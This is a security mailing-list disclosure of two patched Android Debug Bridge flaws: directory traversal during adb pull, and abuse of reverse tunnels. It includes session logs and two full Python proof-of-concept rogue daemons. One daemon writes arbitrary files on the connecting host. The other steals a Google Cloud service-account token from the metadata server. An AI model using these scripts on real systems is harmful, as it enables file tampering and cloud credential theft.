[prev in list] [next in list] [prev in thread] [next in thread]
List: oss-security
Subject: [oss-security] android debug bridge (adb) reverse connection and directory traversal
From: Imre Rad <radimre83 () gmail ! com>
Date: 2022-10-25 13:52:53
Message-ID: CAPWzz4zTnbgP28eppkhPkMPSG7zCWLMrbvg4LsToU0pSRQ74JQ () mail ! gmail ! com
[Download RAW message or body]
Platform Tools v33.0.3
(https://developer.android.com/studio/releases/platform-tools)
released in August addresses two security issues in Android Debug
Bridge. Both require the adb host (e.g. the PC) to connect to a
compromised adb daemon (e.g. the mobile phone). This is a security
concern for example in automated environments or malware labs that run
arbitrary android packages by design.
I found and reported these issues to Google last December.
CVE-2022-20128:
Adb was vulnerable to directory traversal attacks during adb pull
operation. Example session (victim side):
root@eedd4cb8b202:/tmp/platform-tools# cat /etc/proof
cat: /etc/proof: No such file or directory
root@eedd4cb8b202:/tmp/platform-tools# ./adb connect 10.6.8.145:5111
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 10.6.8.145:5111
root@eedd4cb8b202:/tmp/platform-tools# ./adb devices
List of devices attached
10.6.8.145:5111 device
root@eedd4cb8b202:/tmp/platform-tools# ./adb pull /data/local/tmp/1 /tmp/sd=
fsdf
/data/local/tmp/1/: 1 file pulled, 0 skipped. 0.0 MB/s (11 bytes in 0.150s)
root@eedd4cb8b202:/tmp/platform-tools# cat /etc/proof
hello world
PoC code: https://github.com/irsl/CVE-2022-20128 (also attached here)
CVE-2022-3168:
The reverse tunnel feature in Android Debug Bridge (adb) was
vulnerable as it allowed malicious adb daemons to open connections to
arbitrary host/ports and unix domain sockets on the host.
Example session; both sides running on Google Cloud virtual machines
for sake of demonstration. Attacker receives the access token of the
service account the victim VM is running as.
Victim:
$ adb connect 10.128.0.5:5556
connected to 10.128.0.5:5556
Attacker side:
$ ./adb_rogue_daemon.py
...
Wooho, we got response for our rouge request!
b'HTTP/1.0 200 OK\r\nMetadata-Flavor: Google\r\nContent-Type:
application/json\r\nDate: Thu, 04 Nov 2021 22:31:21 GMT\r\nServer:
Metadata Server for VM\r\nConnection: Close\r\nContent-Length:
1049\r\nX-XSS-Protection: 0\r\nX-Frame-Options:
SAMEORIGIN\r\n\r\n{"access_token":"ya29.c.KpgBFghLV[redacted]..............=
...........................................................................=
...........................................................................=
...........................................................................=
...........................................................................=
..........................................................................
PoC code: https://github.com/irsl/CVE-2022-3168-adb-unexpected-reverse-forw=
ards
(also attached here)
Regards,
Imre
["adbdirtrav.py" (text/plain)]
#!/usr/bin/env python3
# This is a dummy, syncronous ADB server written in pure Python by Imre Rad.
# The tool demonstrates a directory traversal vulnerability in the adb implementation.
import os
import sys
import socketserver
import argparse
import unittest
import struct
from collections import namedtuple
LISTEN_PORT = 5555
DESTINATION_PATH = "/etc/proof"
CONTENT = "hello world"
CMD_CNXN = "CNXN"
CMD_OPEN = "OPEN"
CMD_WRTE = "WRTE"
CMD_CLSE = "CLSE"
CMD_OKAY = "OKAY"
Channel = namedtuple("Channel", ["local", "remote", "handler"])
trace_mode = os.getenv("TRACE")
debug_mode = os.getenv("DEBUG")
def calc_adb_checksum(payload : bytes):
sum = 0
for b in payload:
sum = (sum + b) & 0xffffffff
return sum
class Tests(unittest.TestCase):
def test_checksum(self):
ls = bytes("a" * 10000000, "utf-8")
c = calc_adb_checksum(ls)
self.assertEqual(c, 0x39d10680)
def eprint(*args, **kwargs):
print(*args, **kwargs, file=sys.stderr)
def tprint(*args, **kwargs):
if not trace_mode:
return
eprint(*args, **kwargs)
def dprint(*args, **kwargs):
if not debug_mode:
return
eprint(*args, **kwargs)
def myrecv(socket):
r = socket.recv(1024)
tprint("raw recv:", r)
return r
def mysend(socket, payload):
tprint("raw send:", payload)
return socket.sendall(payload)
class AdbHandler(socketserver.BaseRequestHandler):
# this is a map from local to remote channel ids
last_channel_id = 0
channels = {}
def _recv(self):
return myrecv(self.request)
def _send(self, payload):
return mysend(self.request, payload)
def adbsend(self, cmd : str, arg0, arg1, payload = b""):
cmd_bytes = cmd.encode("utf-8")
cmd_int = struct.unpack("I", cmd_bytes)[0]
magic_int = cmd_int ^ 0xffffffff
magic_bytes = struct.pack("I", magic_int)
checksum_int = calc_adb_checksum(payload)
checksum_bytes = struct.pack("I", checksum_int)
arg0_bytes = struct.pack("I", arg0)
arg1_bytes = struct.pack("I", arg1)
length_bytes = struct.pack("I", len(payload))
dprint("send", "cmd:", cmd, "arg0:", arg0, "arg1:", arg1, "payload length:", \
len(payload), "payload:", payload)
full = cmd_bytes + arg0_bytes + arg1_bytes + length_bytes + checksum_bytes + \
magic_bytes + payload return self._send(full)
def handle(self):
r = b""
while True:
a = self._recv()
if not a:
return # EOF
r += a
if len(r) < 24:
raise ValueError("Unexpectedly short message")
while len(r) > 0:
command_str = r[0:4].decode("utf-8")
arg0 = struct.unpack("I", r[4:8])[0]
arg1 = struct.unpack("I", r[8:12])[0]
plen = struct.unpack("I", r[12:16])[0]
if len(r) < 24+plen:
break # need to read more
payload = r[24:24+plen]
r = r[24+plen:]
dprint("recv", "cmd:", command_str, "arg0:", arg0, "arg1:", arg1, "payload \
length:", len(payload), "payload:", payload)
handler_str = "h_"+command_str
if not hasattr(self, handler_str):
raise ValueError("Unsupported message: "+command_str)
getattr(self, handler_str)(arg0, arg1, payload)
# reading the initial banner of the client (CNXN ...)
def h_CNXN(self, arg0, arg1, payload):
# 00 00 00 01 00 00 04 00
return self.adbsend(CMD_CNXN, 0x01000000, 0x00040000, \
b"device::ro.product.name=sdk_phone_x86;ro.product.model=Android SDK built for \
x86;ro.product.device=generic_x86;\x00")
def h_OPEN(self, arg0, arg1, payload):
payload_str = payload.decode("utf-8").rstrip('\x00')
if payload_str != "sync:":
raise ValueError("Unsupported service request "+payload_str.encode("utf-8").hex())
# the pull cmd is opening a sync service
self.last_channel_id += 1
remote_channel_id = arg0
local_channel_id = self.last_channel_id
self.channels[remote_channel_id] = Channel(local_channel_id, remote_channel_id, \
self.service_sync) self.adbsend(CMD_OKAY, self.last_channel_id, arg0)
def h_WRTE(self, arg0, arg1, payload):
ch = self.channels.get(arg0)
if not ch:
raise ValueError("Client attempted to write to a channel that does not exist", \
arg0, arg1)
# we always acknowledge with an OKAY packet, then comes with the service level response
return self.adbsend(CMD_OKAY, ch.local, ch.remote) or \
ch.handler(arg0, arg1, payload)
def h_OKAY(self, arg0, arg1, payload):
# we just swallow
pass
def h_CLSE(self, arg0, arg1, payload):
tprint("CLSE", arg0, arg1, self.channels)
self.channels.pop(arg1, None)
def service_sync(self, local_channel_id, remote_channel_id, payload):
command_str = payload[0:4].decode("utf-8")
rest = payload[4:]
handler_str = "s_sync_"+command_str
if not hasattr(self, handler_str):
raise ValueError("Unsupported sync service message: "+command_str)
getattr(self, handler_str)(local_channel_id, remote_channel_id, rest)
def s_sync_LIST(self, local_channel_id, remote_channel_id, payload):
# adb is asking whether the thing is is about to pull is a directory or a file. We \
always report a directory no matter what it wants. filename = "../../../../../" + \
self.server.args.destination_path filename_bytes = filename.encode("utf-8")
length_bytes = struct.pack("I", len(filename_bytes))
list_rogue = b"DENT" + bytes.fromhex("b6 81 00 00 04 00 00 00 36 8d c9 61") + \
length_bytes + filename_bytes
list_done = b"DONE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
return self.adbsend(CMD_WRTE, remote_channel_id, local_channel_id, list_rogue + \
list_done)
def s_sync_STAT(self, local_channel_id, remote_channel_id, payload):
self.adbsend(CMD_WRTE, remote_channel_id, local_channel_id, bytes.fromhex("53 54 41 54 \
ff 41 00 00 00 10 00 00 36 8d c9 61"))
def s_sync_RECV(self, local_channel_id, remote_channel_id, payload):
requested_filename = payload[4:].decode("utf-8")
if not ".." in requested_filename:
raise ValueError("Attack failed; the client is requesting a file we did not \
expect")
print("Attack worked, client is requesting the file with .. in the name!") # goes to \
stdout to distinguish this from protocol level noise content_length = \
len(self.server.args.content) content_length_bytes = struct.pack("I", content_length)
content_bytes = self.server.args.content.encode("utf-8")
return self.adbsend(CMD_WRTE, remote_channel_id, local_channel_id, b"DATA" + \
content_length_bytes) or \
self.adbsend(CMD_WRTE, remote_channel_id, local_channel_id, content_bytes + \
b"DONE\x00\x00\x00\x00")
def s_sync_QUIT(self, local_channel_id, remote_channel_id, payload):
return self.adbsend(CMD_CLSE, remote_channel_id, local_channel_id)
if __name__ == "__main__":
if os.getenv("TEST"):
unittest.main()
sys.exit(0)
parser = argparse.ArgumentParser()
parser.add_argument("-lp", "--listen-port", type=int, default=LISTEN_PORT, help="The \
listening port") parser.add_argument("-dp", "--destination-path", default=DESTINATION_PATH, \
help="The path to drop the payload on the adb client") parser.add_argument("-c", "--content", \
default=CONTENT, help="The content to send to --destination-path") args = parser.parse_args()
socketserver.TCPServer.allow_reuse_address = True
with socketserver.TCPServer(("0.0.0.0", args.listen_port), AdbHandler) as t:
t.args = args
t.serve_forever()
["adb_rogue_daemon.py" (text/plain)]
#!/usr/bin/env python3
import socket
import adb_shell
from adb_shell import adb_message
from builtins import bytes
HOST = '0.0.0.0' # Standard loopback interface address (localhost)
PORT = 5556 # Port to listen on (non-privileged ports are > 1023)
LOCAL_ID = 1234
TARGET = b'169.254.169.254:80' # b"127.0.0.1:1111"
HTTP_REQUEST = b"GET /computeMetadata/v1/instance/service-accounts/default/token \
HTTP/1.0\r\nHost: "+TARGET+b"\r\nMetadata-Flavor: Google\r\n\r\n"
def pack(cmd, arg0, arg1, payload):
header = adb_message.AdbMessage(cmd, arg0, arg1, payload).pack()
return header+payload
A_CNXN = pack(
adb_shell.constants.CNXN,
16777216, # version
262144, # max_data
b'host::features=stat_v2,cmd,shell_v2'
)
A_OPEN_METADATA = pack(
adb_shell.constants.OPEN,
LOCAL_ID, # local-id
0, # constant, unused
b'tcp:'+TARGET+b'\x00' # destination;
# TODO: test local:... target - no idea if that would work
# TODO: verify what happens if we "forget" sending the trailing \x00
)
def unpack(data):
print(data)
header = data[0:24]
payload = data[24:]
unpacked = adb_message.unpack(header)
# cmd, arg0, arg1, data_length, checksum
payload = payload[0:unpacked[3]]
cmd_str = adb_message.int_to_cmd(unpacked[0]).decode("utf-8")
return (cmd_str, unpacked, payload)
def do_read(conn):
data = conn.recv(1024)
if not data:
return
print("<<<", data)
parsed = unpack(data)
print(parsed)
return parsed
def do_send(conn, data):
print(">>>", data)
conn.sendall(data)
def do_the_job():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen()
print("Listening on", HOST, PORT)
while True:
conn, addr = s.accept()
with conn:
print('Connected by', addr)
request_sent = False
while True:
data = do_read(conn)
if not data:
break
if data[0] == "CNXN":
print("Accepting the incoming connection without authentication")
do_send(conn, A_CNXN)
print("And also asking the remote adb client to kindly connect to our \
target") do_send(conn, A_OPEN_METADATA)
if data[0] == "OKAY" and not request_sent:
print("The connection has established!")
remote_id = data[1][1]
do_send(conn, pack(adb_shell.constants.WRTE, LOCAL_ID, remote_id, \
HTTP_REQUEST)) request_sent = True
if data[0] == "WRTE":
print("Wooho, we got response for our rouge request!")
print(data[2])
print("Connection closed")
if __name__ == "__main__":
do_the_job()
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic